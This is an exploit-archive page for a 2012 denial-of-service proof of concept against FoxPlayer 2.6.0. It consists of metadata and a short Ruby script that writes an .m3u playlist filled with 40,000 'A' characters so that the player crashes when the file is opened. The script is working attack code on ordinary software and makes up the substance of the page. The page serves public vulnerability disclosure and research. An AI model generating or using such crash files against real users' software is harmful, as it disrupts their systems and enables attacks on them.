FoxPlayer 2.6.0 - Denial of Service



EDB-ID: 18691 CVE: N/A OSVDB-ID: 80806
Author: Ahmed Elhady Mohamed Published: 2012-04-01 Verified: Verified
Exploit Code:   Download Vulnerable App:   N/A

Rating

(0.0)
Screenshot
Prev Home Next
Denial of Service in FoxPlayer version 2.6.0
===================================================================================
# Exploit Title:Denial of Service in FoxPlayer version 2.6.0
# Download link :http://www.foxmediatools.com/installers/fox-player-setup.exe
# Author: Ahmed Elhady Mohamed
# Email : ahmed.elhady.mohamed@gmail.com
# version: version 2.6.0
# Category: DOS
# Tested on: windows XP SP3
===================================================================================
########################################DESC#######################################
#Foxplayer 2.6.0 suffers form a denial of service vulnerability ,when opening a   #
#malicious .m3u file.                                                             #
###################################################################################

#!/usr/bin/ruby
File.open "Crash.m3u" , "w" do |file|
	junk = "A" * 40000
	file.puts junk
end